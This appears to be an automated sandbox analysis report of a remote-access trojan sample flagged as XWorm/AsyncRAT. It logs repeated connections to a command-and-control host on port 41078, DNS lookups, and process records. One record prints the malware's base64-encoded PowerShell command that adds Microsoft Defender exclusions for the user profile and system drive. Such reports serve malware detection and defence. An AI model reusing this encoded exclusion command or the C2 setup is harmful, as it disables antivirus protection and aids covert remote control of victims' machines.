                                                                                  Mar 16, 2025 13:09:07.560883045 CET4975441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:07.566212893 CET4107849754193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:07.576287031 CET4975441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:07.581161022 CET4107849754193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:07.591974974 CET4975441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:07.596594095 CET4107849754193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:07.701330900 CET4975441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:07.706119061 CET4107849754193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:09.189443111 CET4107849754193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:09.189507008 CET4975441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:12.999699116 CET4975441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:13.000042915 CET4975541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:13.005409002 CET4107849754193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:13.005424023 CET4107849755193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:13.005827904 CET4975541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:13.077464104 CET4975541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:13.082151890 CET4107849755193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:13.091820002 CET4975541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:13.096530914 CET4107849755193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:14.654392958 CET4107849755193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:14.654556990 CET4975541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:18.295644045 CET4975541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:18.296391964 CET4975641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:18.300368071 CET4107849755193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:18.301147938 CET4107849756193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:18.301285028 CET4975641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:18.615691900 CET4975641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:18.620485067 CET4107849756193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:19.949687004 CET4107849756193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:19.949764967 CET4975641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:23.716996908 CET4975641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:23.720458031 CET4975741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:23.721757889 CET4107849756193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:23.725204945 CET4107849757193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:23.725281954 CET4975741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:23.765374899 CET4975741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:23.770073891 CET4107849757193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:23.966974974 CET4975741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:23.971823931 CET4107849757193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:23.982422113 CET4975741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:23.987236977 CET4107849757193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:24.060655117 CET4975741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:24.065567017 CET4107849757193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:25.392878056 CET4107849757193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:25.392946959 CET4975741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:29.154534101 CET4975741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:29.157639980 CET4975841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:29.159615040 CET4107849757193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:29.162761927 CET4107849758193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:29.162830114 CET4975841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:29.199457884 CET4975841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:29.204138041 CET4107849758193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:29.482573986 CET4975841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:29.487298012 CET4107849758193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:30.809381008 CET4107849758193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:30.809763908 CET4975841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:34.232552052 CET4975841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:34.235542059 CET4975941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:34.237637997 CET4107849758193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:34.240210056 CET4107849759193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:34.240298033 CET4975941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:34.357696056 CET4975941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:34.362416029 CET4107849759193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:35.920232058 CET4107849759193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:35.920325041 CET4975941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:39.857486010 CET4975941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:39.859621048 CET4976041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:39.862241983 CET4107849759193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:39.864314079 CET4107849760193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:39.864402056 CET4976041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:39.903192997 CET4976041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:39.907907963 CET4107849760193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:39.920280933 CET4976041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:39.924948931 CET4107849760193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:39.983426094 CET4976041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:39.988135099 CET4107849760193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:40.264029980 CET4976041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:40.268735886 CET4107849760193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:41.532206059 CET4107849760193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:41.532299042 CET4976041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:45.357424974 CET4976041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:45.359545946 CET4976141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:45.363554001 CET4107849760193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:45.364615917 CET4107849761193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:45.364717960 CET4976141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:45.410748005 CET4976141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:45.415939093 CET4107849761193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:47.034221888 CET4107849761193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:47.034460068 CET4976141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:50.498106956 CET4976141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:50.500607967 CET4976241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:50.502876043 CET4107849761193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:50.505727053 CET4107849762193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:50.505964994 CET4976241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:50.597912073 CET4976241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:50.602664948 CET4107849762193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:51.358052015 CET4976241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:51.362919092 CET4107849762193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:52.157104015 CET4107849762193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:52.161848068 CET4976241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:55.748111963 CET4976241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:55.751099110 CET4976341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:55.752837896 CET4107849762193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:55.755778074 CET4107849763193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:55.755851984 CET4976341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:55.791140079 CET4976341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:55.795866013 CET4107849763193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:55.824558973 CET4976341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:55.829287052 CET4107849763193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:55.936101913 CET4976341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:55.940817118 CET4107849763193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:56.045331001 CET4976341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:09:56.050098896 CET4107849763193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:57.407325029 CET4107849763193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:09:57.407383919 CET4976341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:01.248295069 CET4976341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:01.250228882 CET4976441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:01.254657984 CET4107849763193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:01.256843090 CET4107849764193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:01.256920099 CET4976441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:01.312498093 CET4976441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:01.319417953 CET4107849764193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:01.326561928 CET4976441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:01.333451986 CET4107849764193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:02.924853086 CET4107849764193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:02.924968958 CET4976441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:06.514064074 CET4976441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:06.518821955 CET4107849764193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:06.523104906 CET4976541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:06.527851105 CET4107849765193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:06.529831886 CET4976541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:06.625868082 CET4976541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:06.630667925 CET4107849765193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:08.169517994 CET4107849765193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:08.170176983 CET4976541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:12.076328039 CET4976541078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:12.078972101 CET4976641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:12.081063986 CET4107849765193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:12.083683014 CET4107849766193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:12.083755970 CET4976641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:12.115642071 CET4976641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:12.120302916 CET4107849766193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:13.755343914 CET4107849766193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:13.755417109 CET4976641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:18.107588053 CET4976641078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:18.110315084 CET4976741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:18.112289906 CET4107849766193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:18.115014076 CET4107849767193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:18.115078926 CET4976741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:18.150284052 CET4976741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:18.155241966 CET4107849767193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:19.764240980 CET4107849767193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:19.764311075 CET4976741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:23.201404095 CET4976741078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:23.202939987 CET4976841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:23.206129074 CET4107849767193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:23.207628012 CET4107849768193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:23.207695007 CET4976841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:23.240792036 CET4976841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:23.245443106 CET4107849768193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:23.279725075 CET4976841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:23.284477949 CET4107849768193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:24.861304998 CET4107849768193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:24.864451885 CET4976841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:28.344188929 CET4976841078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:28.346059084 CET4976941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:28.352019072 CET4107849768193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:28.354089022 CET4107849769193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:28.354209900 CET4976941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:28.586102009 CET4976941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:28.591010094 CET4107849769193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:30.034718037 CET4107849769193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:30.034786940 CET4976941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:33.701652050 CET4976941078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:33.703762054 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:33.706379890 CET4107849769193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:33.709311962 CET4107849770193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:33.709378958 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:33.744040966 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:33.748786926 CET4107849770193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:35.372462034 CET4107849770193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:35.372536898 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:38.781677961 CET4977041078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:38.782514095 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:38.786456108 CET4107849770193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:38.787229061 CET4107849771193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:38.787333965 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:39.003680944 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:39.008479118 CET4107849771193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:40.437388897 CET4107849771193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:40.437506914 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.312792063 CET4977141078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.313827991 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.317583084 CET4107849771193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:44.318532944 CET4107849772193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:44.318658113 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.481995106 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:44.486712933 CET4107849772193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:45.988286018 CET4107849772193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:45.988369942 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.498606920 CET4977241078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.502090931 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.503377914 CET4107849772193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.506830931 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.506895065 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.549520016 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.554223061 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.654937983 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.659632921 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.686027050 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.690692902 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.748537064 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.754509926 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.936309099 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.943798065 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.951716900 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.959435940 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.967294931 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:49.974744081 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:49.998617887 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:50.004221916 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:50.123549938 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:50.129184961 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:51.155086994 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:51.158202887 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.187570095 CET4977441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.187570095 CET4977341078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.192326069 CET4107849773193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:55.192341089 CET4107849774193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:55.194120884 CET4977441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.288131952 CET4977441078192.168.2.4193.161.193.99
                                                                                  Mar 16, 2025 13:10:55.292884111 CET4107849774193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:56.858045101 CET4107849774193.161.193.99192.168.2.4
                                                                                  Mar 16, 2025 13:10:56.858232021 CET4977441078192.168.2.4193.161.193.99

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Mar 16, 2025 13:06:58.466489077 CET6261353192.168.2.41.1.1.1
                                                                                  Mar 16, 2025 13:06:58.475517988 CET53626131.1.1.1192.168.2.4
                                                                                  Mar 16, 2025 13:06:58.779984951 CET5496653192.168.2.41.1.1.1
                                                                                  Mar 16, 2025 13:06:58.807938099 CET53549661.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Mar 16, 2025 13:06:58.466489077 CET192.168.2.41.1.1.10x7e89Standard query (0)settings-ssl.xboxlive.comA (IP address)IN (0x0001)false
                                                                                  Mar 16, 2025 13:06:58.779984951 CET192.168.2.41.1.1.10x8835Standard query (0)Dyno15-41078.portmap.hostA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Mar 16, 2025 13:06:58.475517988 CET1.1.1.1192.168.2.40x7e89No error (0)settings-ssl.xboxlive.comsettings-ssl.xboxlive.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 16, 2025 13:06:58.475517988 CET1.1.1.1192.168.2.40x7e89No error (0)settings-ssl.xboxlive.com.edgekey.nete87.dspb.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Mar 16, 2025 13:06:58.475517988 CET1.1.1.1192.168.2.40x7e89No error (0)e87.dspb.akamaiedge.net92.123.20.9A (IP address)IN (0x0001)false
                                                                                  Mar 16, 2025 13:06:58.807938099 CET1.1.1.1192.168.2.40x8835No error (0)Dyno15-41078.portmap.host193.161.193.99A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • settings-ssl.xboxlive.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.44971092.123.20.94437992C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-03-16 12:06:59 UTC216OUTGET /XBLWinClient/v10_music/configuration.xml HTTP/1.1
                                                                                  Accept: */*
                                                                                  User-Agent: XBLWIN10.19071
                                                                                  Accept-Language: en-CH
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: settings-ssl.xboxlive.com
                                                                                  Connection: Keep-Alive
                                                                                  2025-03-16 12:06:59 UTC249INHTTP/1.1 200 OK
                                                                                  Cache-Control: public, max-age=3600
                                                                                  Content-Type: text/xml
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XblCorrelationId: dcca7236-6e99-4fe7-b6cc-f04b265950e5
                                                                                  Date: Sun, 16 Mar 2025 12:06:59 GMT
                                                                                  Content-Length: 2659
                                                                                  Connection: close
                                                                                  2025-03-16 12:06:59 UTC2659INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6c 69 65 6e 74 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 58 62 6c 57 69 6e 43 6c 69 65 6e 74 2f 32 30 31 32 2f 30 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 22 3e 0d 0a 20 20 20 20 3c 74 61 72 67 65 74 65 64 43 6c 69 65 6e 74 3e 58 62 6c 57 69 6e 43 6c 69 65 6e 74 3c 2f 74 61 72 67 65 74 65 64 43 6c 69 65 6e 74 20 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 72 69 67 68 74 73 3e 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 43
                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><clientConfiguration xmlns="http://schemas.microsoft.com/XblWinClient/2012/03" version="1"> <targetedClient>XblWinClient</targetedClient > <rights>Copyright (c) Microsoft C


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:08:06:50
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Users\user\Desktop\test2.exe.bin.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\test2.exe.bin.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:153'600 bytes
                                                                                  MD5 hash:2AA459D8249147D19837B06C8640A950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1208279408.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:08:06:51
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AdgB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYwBuACMAPgA="
                                                                                  Imagebase:0xfd0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:08:06:51
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff62fc20000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:08:06:51
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\XClient.exe"
                                                                                  Imagebase:0x190000
                                                                                  File size:66'560 bytes
                                                                                  MD5 hash:4D152B9AAAEC95BD696369CE3793BBF5
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
